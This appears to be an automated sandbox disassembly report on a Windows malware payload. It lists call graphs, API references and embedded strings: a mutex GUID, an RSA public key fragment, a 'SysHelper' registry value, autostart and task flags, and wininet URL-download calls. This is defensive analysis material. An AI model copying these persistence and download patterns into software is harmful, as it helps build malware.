41550->41558 41552->41537 41552->41540 41553->41532 41554->41543 41555->41546 41556->41548 41557->41550 41558->41552 41562 49fa8f 41559->41562 41561 49fbbf 41561->41543 41564 49fa9b _fputws 41562->41564 41563 49fab1 41565 485208 _fputws 58 API calls 41563->41565 41564->41563 41566 49fae7 41564->41566 41567 49fab6 41565->41567 41574 49fb58 41566->41574 41573 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 41567->41573 41572 49fac0 _fputws 41572->41561 41573->41572 41582 487970 41574->41582 41577 49bac1 __wsopen_nolock 109 API calls 41578 49fb92 41577->41578 41579 480bed _free 58 API calls 41578->41579 41580 49fb03 41579->41580 41581 49fb2c LeaveCriticalSection __unlock_fhandle 41580->41581 41581->41572 41583 48797d 41582->41583 41584 487993 41582->41584 41586 485208 _fputws 58 API calls 41583->41586 41584->41583 41585 48799a ___crtIsPackagedApp 41584->41585 41589 4879b0 MultiByteToWideChar 41585->41589 41590 4879a3 AreFileApisANSI 41585->41590 41587 487982 41586->41587 41603 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 41587->41603 41592 4879ca GetLastError 41589->41592 41593 4879db 41589->41593 41590->41589 41591 4879ad 41590->41591 41591->41589 41604 4851e7 58 API calls 3 library calls 41592->41604 41595 488cde __malloc_crt 58 API calls 41593->41595 41596 4879e3 41595->41596 41597 48798c 41596->41597 41598 4879ea MultiByteToWideChar 41596->41598 41597->41577 41597->41580 41598->41597 41599 487a00 GetLastError 41598->41599 41605 4851e7 58 API calls 3 library calls 41599->41605 41601 487a0c 41602 480bed _free 58 API calls 41601->41602 41602->41597 41603->41597 41604->41597 41605->41601 41607 487e1a _fputws 41606->41607 41608 488af7 __lock 51 API calls 41607->41608 41609 487e21 41608->41609 41610 487eda _doexit 41609->41610 41611 487e4f DecodePointer 41609->41611 41626 487f28 41610->41626 41611->41610 41613 487e66 DecodePointer 41611->41613 41619 487e76 41613->41619 41615 487f37 _fputws 41615->39635 41617 487f1f 41620 487b0b _doexit 3 API calls 41617->41620 41618 487e83 EncodePointer 41618->41619 41619->41610 41619->41618 41621 487e93 DecodePointer EncodePointer 41619->41621 41623 487ea5 DecodePointer DecodePointer 41619->41623 41622 487f28 41620->41622 41621->41619 41625 487f35 41622->41625 41631 488c81 LeaveCriticalSection 41622->41631 41623->41619 41625->39635 41627 487f2e 41626->41627 41628 487f08 41626->41628 41632 488c81 LeaveCriticalSection 41627->41632 41628->41615 41630 488c81 LeaveCriticalSection 41628->41630 41630->41617 41631->41625 41632->41628 41633 4e1920 41634 48f7c0 __write_nolock 41633->41634 41635 4e1943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41634->41635 41636 4e1a0b 41635->41636 41637 4e19e2 GetProcAddress GetProcAddress 41635->41637 41638 4e1aab 41636->41638 41641 4e1a1b NetStatisticsGet 41636->41641 41637->41636 41639 4e1acb 41638->41639 41640 4e1ac4 FreeLibrary 41638->41640 41642 4e1ad5 GetProcAddress GetProcAddress GetProcAddress 41639->41642 41670 4e1b0d __write_nolock 41639->41670 41640->41639 41643 4e1a69 NetStatisticsGet 41641->41643 41644 4e1a33 __write_nolock 41641->41644 41642->41670 41643->41638 41645 4e1a87 __write_nolock 41643->41645 41649 4bd550 101 API calls 41644->41649 41653 4bd550 101 API calls 41645->41653 41646 4e1bee 41647 4e1c1b 41646->41647 41648 4e1c14 FreeLibrary 41646->41648 41650 4e1c24 41647->41650 41651 4e1c31 LoadLibraryA 41647->41651 41648->41647 41652 4e1a5a 41649->41652 41733 4b49a0 13 API calls 4 library calls 41650->41733 41655 4e1c4a GetProcAddress GetProcAddress GetProcAddress 41651->41655 41656 4e1d4b 41651->41656 41652->41643 41653->41638 41666 4e1c84 __write_nolock 41655->41666 41675 4e1cac __write_nolock 41655->41675 41658 4e223f 41656->41658 41659 4e1d59 12 API calls 41656->41659 41657 4e1c29 41657->41651 41657->41656 41721 4e2470 41658->41721 41660 4e1e5c 41659->41660 41661 4e2233 FreeLibrary 41659->41661 41660->41661 41682 4e1ed9 CreateToolhelp32Snapshot 41660->41682 41661->41658 41664 4e1d3f FreeLibrary 41664->41656 41665 4e225b __write_nolock 41668 4bd550 101 API calls 41665->41668 41669 4bd550 101 API calls 41666->41669 41667 4e1d03 __write_nolock 41667->41664 41674 4bd550 101 API calls 41667->41674 41671 4e2276 GetCurrentProcessId 41668->41671 41669->41675 41670->41646 41673 4bd550 101 API calls 41670->41673 41679 4e1b7c __write_nolock 41670->41679 41672 4e228f __write_nolock 41671->41672 41677 4bd550 101 API calls 41672->41677 41673->41679 41676 4e1d3c 41674->41676 41675->41667 41678 4bd550 101 API calls 41675->41678 41676->41664 41680 4e22aa 41677->41680 41678->41667 41679->41646 41681 4bd550 101 API calls 41679->41681 41683 48a77e UnDecorator::getTemplateArgumentList 6 API calls 41680->41683 41681->41646 41682->41661 41684 4e1ef0 41682->41684 41685 4e22ca 41683->41685 41686 4e1f15 Heap32ListFirst 41684->41686 41687 4e1f03 GetTickCount 41684->41687 41688 4e2081 41686->41688 41693 4e1f28 __write_nolock 41686->41693 41687->41686 41689 4e209d Process32First 41688->41689 41690 4e2095 GetTickCount 41688->41690 41691 4e210a 41689->41691 41697 4e20b4 __write_nolock 41689->41697 41690->41689 41692 4e2118 GetTickCount 41691->41692 41702 4e2120 __write_nolock 41691->41702 41692->41702 41693->41688 41700 4e204e Heap32ListNext 41693->41700 41701 4e2066 GetTickCount 41693->41701 41704 4bd550 101 API calls 41693->41704 41711 4e1ff1 GetTickCount 41693->41711 41715 4bd550 41693->41715 41695 4bd550 101 API calls 41695->41697 41696 4e1f56 Heap32First 41696->41693 41697->41691 41697->41695 41705 4e20fb GetTickCount 41697->41705 41698 4e2196 41699 4e21a4 GetTickCount 41698->41699 41710 4e21ac __write_nolock 41698->41710 41699->41710 41700->41688 41700->41693 41701->41688 41701->41693 41702->41698 41703 4bd550 101 API calls 41702->41703 41713 4e2187 GetTickCount 41702->41713 41703->41702 41707 4e1fd9 Heap32Next 41704->41707 41705->41691 41705->41697 41706 4e2219 41708 4e222d CloseHandle 41706->41708 41709 4e2229 41706->41709 41707->41693 41708->41661 41709->41661 41710->41706 41712 4bd550 101 API calls 41710->41712 41714 4e220a GetTickCount 41710->41714 41711->41693 41712->41710 41713->41698 41713->41702 41714->41706 41714->41710 41716 4bd559 41715->41716 41718 4bd57d __write_nolock 41715->41718 41734 4cb5d0 101 API calls __except_handler4 41716->41734 41718->41696 41719 4bd55f 41719->41718 41735 4ba5e0 101 API calls __except_handler4 41719->41735 41722 4e247a __write_nolock 41721->41722 41723 4e24c3 GetTickCount 41722->41723 41724 4e2483 QueryPerformanceCounter 41722->41724 41727 4e24d6 __write_nolock 41723->41727 41725 4e2499 __write_nolock 41724->41725 41726 4e2492 41724->41726 41730 4bd550 101 API calls 41725->41730 41726->41723 41728 4bd550 101 API calls 41727->41728 41729 4e24ea 41728->41729 41731 4e2244 GlobalMemoryStatus 41729->41731 41732 4e24b7 41730->41732 41731->41665 41732->41723 41732->41731 41733->41657 41734->41719 41735->41718

                                                                                                                            Executed Functions

                                                                                                                            Function 00479F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046CF10: _memset.LIBCMT ref: 0046CF4A
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00479FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00479FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00A3B7F8,?), ref: 0047A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 0047A161
                                                                                                                              • Part of subcall function 004724E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                              • Part of subcall function 004724E0: GetLastError.KERNEL32 ref: 00472509
                                                                                                                              • Part of subcall function 004724E0: CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1V$list<T> too long$x*V$x2W${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7V
                                                                                                                            • API String ID: 2957410896-2125747970
                                                                                                                            • Opcode ID: b19d47b218fba90ababaab0ef5b708722d7ec817f6fad7e5e0a517157c8f4a8b
                                                                                                                            • Instruction ID: 48c03d4a3856c862ba0d6869a8837064167bef53de054655856ab1d5f035bafb
                                                                                                                            • Opcode Fuzzy Hash: b19d47b218fba90ababaab0ef5b708722d7ec817f6fad7e5e0a517157c8f4a8b
                                                                                                                            • Instruction Fuzzy Hash: EDD2E470504341ABD724EF25C845BDF7BE4BF91308F00891EF48987292EB799A19DB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004E1920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 606 4e1920-4e19e0 call 48f7c0 GetVersionExA LoadLibraryA * 3 609 4e1a0b-4e1a0d 606->609 610 4e19e2-4e1a05 GetProcAddress * 2 606->610 611 4e1aba-4e1ac2 609->611 612 4e1a13-4e1a15 609->612 610->609 613 4e1acb-4e1ad3 611->613 614 4e1ac4-4e1ac5 FreeLibrary 611->614 612->611 615 4e1a1b-4e1a31 NetStatisticsGet 612->615 616 4e1b0d 613->616 617 4e1ad5-4e1b0b GetProcAddress * 3 613->617 614->613 618 4e1a69-4e1a85 NetStatisticsGet 615->618 619 4e1a33-4e1a5d call 48f7c0 call 4bd550 615->619 620 4e1b0f-4e1b17 616->620 617->620 618->611 622 4e1a87-4e1aae call 48f7c0 call 4bd550 618->622 619->618 624 4e1b1d-4e1b23 620->624 625 4e1c0a-4e1c12 620->625 622->611 624->625 630 4e1b29-4e1b2b 624->630 627 4e1c1b-4e1c22 625->627 628 4e1c14-4e1c15 FreeLibrary 625->628 632 4e1c24-4e1c2b call 4b49a0 627->632 633 4e1c31-4e1c44 LoadLibraryA 627->633 628->627 630->625 635 4e1b31-4e1b47 630->635 632->633 639 4e1d4b-4e1d53 632->639 638 4e1c4a-4e1c82 GetProcAddress * 3 633->638 633->639 652 4e1b98-4e1baa 635->652 653 4e1b49-4e1b5d 635->653 644 4e1caf-4e1cb7 638->644 645 4e1c84 638->645 642 4e223f-4e2256 call 4e2470 GlobalMemoryStatus call 48f7c0 639->642 643 4e1d59-4e1e56 GetProcAddress * 12 639->643 670 4e225b-4e22cd call 4bd550 GetCurrentProcessId call 48f7c0 call 4bd550 call 48a77e 642->670 649 4e1e5c-4e1e63 643->649 650 4e2233-4e2239 FreeLibrary 643->650 647 4e1cb9-4e1cc0 644->647 648 4e1d06-4e1d08 644->648 658 4e1c86-4e1cac call 48f7c0 call 4bd550 645->658 654 4e1ccb-4e1ccd 647->654 655 4e1cc2-4e1cc9 647->655 659 4e1d3f-4e1d45 FreeLibrary 648->659 660 4e1d0a-4e1d3c call 48f7c0 call 4bd550 648->660 649->650 656 4e1e69-4e1e70 649->656 650->642 662 4e1bb2-4e1bb4 652->662 672 4e1b5f-4e1b84 call 48f7c0 call 4bd550 653->672 673 4e1b8a-4e1b8c 653->673 654->648 661 4e1ccf-4e1cde 654->661 655->648 655->654 656->650 663 4e1e76-4e1e7d 656->663 658->644 659->639 660->659 661->648 684 4e1ce0-4e1d03 call 48f7c0 call 4bd550 661->684 662->625 668 4e1bb6-4e1bca 662->668 663->650 669 4e1e83-4e1e8a 663->669 691 4e1bfc-4e1bfe 668->691 692 4e1bcc-4e1bf6 call 48f7c0 call 4bd550 668->692 669->650 676 4e1e90-4e1e97 669->676 672->673 673->652 676->650 686 4e1e9d-4e1ea4 676->686 684->648 686->650 693 4e1eaa-4e1eb1 686->693 691->625 692->691 693->650 699 4e1eb7-4e1ebe 693->699 699->650 700 4e1ec4-4e1ecb 699->700 700->650 704 4e1ed1-4e1ed3 700->704 704->650 708 4e1ed9-4e1eea CreateToolhelp32Snapshot 704->708 708->650 711 4e1ef0-4e1f01 708->711 713 4e1f15-4e1f22 Heap32ListFirst 711->713 714 4e1f03-4e1f0f GetTickCount 711->714 715 4e1f28-4e1f2d 713->715 716 4e2081-4e2093 713->716 714->713 717 4e1f33-4e1f9d call 48f7c0 call 4bd550 Heap32First 715->717 718 4e209d-4e20b2 Process32First 716->718 719 4e2095-4e2097 GetTickCount 716->719 735 4e1f9f-4e1faa 717->735 736 4e2015-4e2060 Heap32ListNext 717->736 721 4e210a-4e2116 718->721 722 4e20b4-4e20f5 call 48f7c0 call 4bd550 718->722 719->718 723 4e2118-4e211a GetTickCount 721->723 724 4e2120-4e2135 721->724 722->721 746 4e20f7-4e20f9 722->746 723->724 733 4e2196-4e21a2 724->733 734 4e2137 724->734 737 4e21ac-4e21c1 733->737 738 4e21a4-4e21a6 GetTickCount 733->738 740 4e2140-4e2181 call 48f7c0 call 4bd550 734->740 741 4e1fb0-4e1feb call 48f7c0 call 4bd550 Heap32Next 735->741 736->716 743 4e2062-4e2064 736->743 755 4e2219-4e2227 737->755 756 4e21c3-4e2204 call 48f7c0 call 4bd550 737->756 738->737 740->733 770 4e2183-4e2185 740->770 762 4e200f 741->762 763 4e1fed-4e1fef 741->763 747 4e2079-4e207b 743->747 748 4e2066-4e2077 GetTickCount 743->748 746->722 754 4e20fb-4e2108 GetTickCount 746->754 747->716 747->717 748->716 748->747 754->721 754->722 759 4e222d CloseHandle 755->759 760 4e2229-4e222b 755->760 756->755 774 4e2206-4e2208 756->774 759->650 760->650 762->736 766 4e2004-4e200d 763->766 767 4e1ff1-4e2002 GetTickCount 763->767 766->741 766->762 767->762 767->766 770->740 772 4e2187-4e2194 GetTickCount 770->772 772->733 772->740 774->756 775 4e220a-4e2217 GetTickCount 774->775 775->755 775->756
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 004E1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004E1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004E19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004E19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004E19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004E19FB
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 004E1A2D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 004E1A81
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004E1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004E1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004E1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004E1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004E1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004E1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004E1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004E1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004E1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 004E1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004E1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004E1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004E1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 004E1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 004E1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 004E1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004E1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 004E1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 004E1E44
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 004E1EDD
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1F03
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 004E1F1A
                                                                                                                            • Heap32First.KERNEL32(00000024,?,?), ref: 004E1F95
                                                                                                                            • Heap32Next.KERNEL32(?,?,?,?,?,7D14E1D3), ref: 004E1FE3
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1FF1
                                                                                                                            • Heap32ListNext.KERNEL32(?,?), ref: 004E2058
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2095
                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 004E20AA
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E21A4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 4174345323-1723836103
                                                                                                                            • Opcode ID: 2df9f7bd7bec59fbb9d45209e0490751fe08a4938b328f85146e29752404d8f9
                                                                                                                            • Instruction ID: cbd03a992584a4f3ec5e08c4616c2292859e86f30c5eface954cf06a3af9bf4d
                                                                                                                            • Opcode Fuzzy Hash: 2df9f7bd7bec59fbb9d45209e0490751fe08a4938b328f85146e29752404d8f9
                                                                                                                            • Instruction Fuzzy Hash: 8A3282B0E402699ADB209F65CC45B9FBA79FF45705F0041EBA60CE3291EB748E84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 776 47e690-47e6d8 call 48f7c0 timeGetTime call 483f74 call 46c6a0 783 47e6e0-47e6e6 776->783 784 47e6f0-47e722 call 48b420 call 46c500 783->784 789 47e724-47e729 784->789 790 47e72e-47e772 InternetOpenW 784->790 791 47ea1f-47ea40 call 483cf0 789->791 792 47e774-47e776 790->792 793 47e778-47e77d 790->793 801 47ea42-47ea46 791->801 802 47ea8d-47eacc lstrlenA lstrcpyA * 2 lstrlenA 791->802 796 47e78f-47e7b8 call 475ae0 call 481c02 792->796 794 47e780-47e789 793->794 794->794 797 47e78b-47e78d 794->797 816 47e882-47e8e5 call 475ae0 call 473ff0 call 472900 call 4759d0 796->816 817 47e7be-47e7f7 call 474690 call 46dd40 796->817 797->796 806 47ea4c-47ea61 SHGetFolderPathA 801->806 807 47ee2a call 471b10 801->807 803 47eaef-47eb12 802->803 804 47eace 802->804 811 47eb14-47eb16 803->811 812 47eb18-47eb1f 803->812 808 47ead0-47ead8 804->808 806->784 813 47ea67-47ea88 PathAppendA DeleteFileA 806->813 818 47ee2f-47ee3a 807->818 814 47eaeb 808->814 815 47eada-47eae7 lstrlenA 808->815 819 47eb2b-47eb4f call 4756d0 call 472900 811->819 820 47eb22-47eb27 812->820 813->784 814->803 815->808 821 47eae9 815->821 873 47e8e7-47e8f0 call 482587 816->873 874 47e8f3-47e917 lstrcpyW 816->874 845 47e86f-47e874 817->845 846 47e7f9-47e7fe 817->846 823 47ee4d-47ee82 call 46ef50 818->823 824 47ee3c-47ee3f 818->824 843 47eb53-47eb66 lstrcpyW 819->843 844 47eb51 819->844 820->820 826 47eb29 820->826 821->803 838 47ee86-47ee8c 823->838 824->783 826->819 840 47ee92-47ee94 838->840 841 47ee8e-47ee90 838->841 849 47ee97-47ee9c 840->849 847 47eea0-47eeaf call 473ea0 841->847 850 47eb74-47ebe4 lstrlenA call 480c62 call 48b420 MultiByteToWideChar lstrcpyW call 483cf0 843->850 851 47eb68-47eb71 call 482587 843->851 844->843 845->816 852 47e876-47e87f call 482587 845->852 853 47e800-47e809 call 482587 846->853 854 47e80c-47e827 846->854 847->838 875 47eeb1-47eee3 call 46ef50 847->875 849->849 858 47ee9e 849->858 901 47ebe6-47ebea 850->901 902 47ec3d-47ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 850->902 851->850 852->816 853->854 855 47e842-47e848 854->855 856 47e829-47e82d 854->856 865 47e84e-47e86c 855->865 864 47e82f-47e840 call 4805a0 856->864 856->865 858->847 864->865 865->845 873->874 879 47e943-47e97a InternetOpenUrlW InternetReadFile 874->879 880 47e919-47e920 874->880 893 47eee7-47eeed 875->893 887 47e9ec-47ea08 InternetCloseHandle * 2 879->887 888 47e97c-47e994 SHGetFolderPathA 879->888 880->879 884 47e922-47e92e 880->884 891 47e937 884->891 892 47e930-47e935 884->892 889 47ea16-47ea19 887->889 890 47ea0a-47ea13 call 482587 887->890 888->887 895 47e996-47e9c2 PathAppendA call 4820b6 888->895 889->791 890->889 898 47e93c-47e93d lstrcatW 891->898 892->898 899 47eef3-47eef5 893->899 900 47eeef-47eef1 893->900 895->887 912 47e9c4-47e9e9 lstrlenA call 482b02 call 483a38 895->912 898->879 908 47eef8-47eefd 899->908 907 47ef01-47ef10 call 473ea0 900->907 901->807 909 47ebf0-47ec11 SHGetFolderPathA 901->909 904 47ecbf-47ecdd 902->904 905 47ec99 902->905 914 47ece3-47eced 904->914 915 47ecdf-47ece1 904->915 913 47eca0-47eca8 905->913 907->893 923 47ef12-47ef4c call 473ff0 call 472900 907->923 908->908 916 47eeff 908->916 909->784 911 47ec17-47ec38 PathAppendA DeleteFileA 909->911 911->783 912->887 919 47ecbb 913->919 920 47ecaa-47ecb7 lstrlenA 913->920 922 47ecf0-47ecf5 914->922 921 47ecf9-47ed1b call 4756d0 call 472900 915->921 916->907 919->904 920->913 925 47ecb9 920->925 936 47ed1f-47ed35 lstrcpyW 921->936 937 47ed1d 921->937 922->922 926 47ecf7 922->926 941 47ef50-47ef68 lstrcpyW 923->941 942 47ef4e 923->942 925->904 926->921 939 47ed37-47ed40 call 482587 936->939 940 47ed43-47edab lstrlenA call 480c62 call 48b420 MultiByteToWideChar lstrcpyW lstrlenW 936->940 937->936 939->940 957 47edad-47edb6 lstrlenW 940->957 958 47edbc-47edc1 940->958 945 47ef76-47efb3 call 473ff0 call 472900 941->945 946 47ef6a-47ef73 call 482587 941->946 942->941 959 47efb7-47efc6 lstrcpyW 945->959 960 47efb5 945->960 946->945 957->958 961 47ee44-47ee48 957->961 962 47edc3-47ede4 SHGetFolderPathA 958->962 963 47ee10-47ee12 958->963 966 47efd4-47efe0 959->966 967 47efc8-47efd1 call 482587 959->967 960->959 968 47f01a-47f030 961->968 962->784 969 47edea-47ee0b PathAppendA DeleteFileA 962->969 964 47ee14-47ee1a call 480bed 963->964 965 47ee1d-47ee1f 963->965 964->965 965->807 971 47ee21-47ee27 call 480bed 965->971 973 47efe2-47efeb call 482587 966->973 974 47efee-47f008 966->974 967->966 969->783 971->807 973->974 979 47f016 974->979 980 47f00a-47f013 call 482587 974->980 979->968 980->979
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,0052B3EC,000000FF), ref: 0047E6C0
                                                                                                                              • Part of subcall function 0046C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0047E6D4), ref: 0046C6C2
                                                                                                                              • Part of subcall function 0046C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                              • Part of subcall function 0046C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
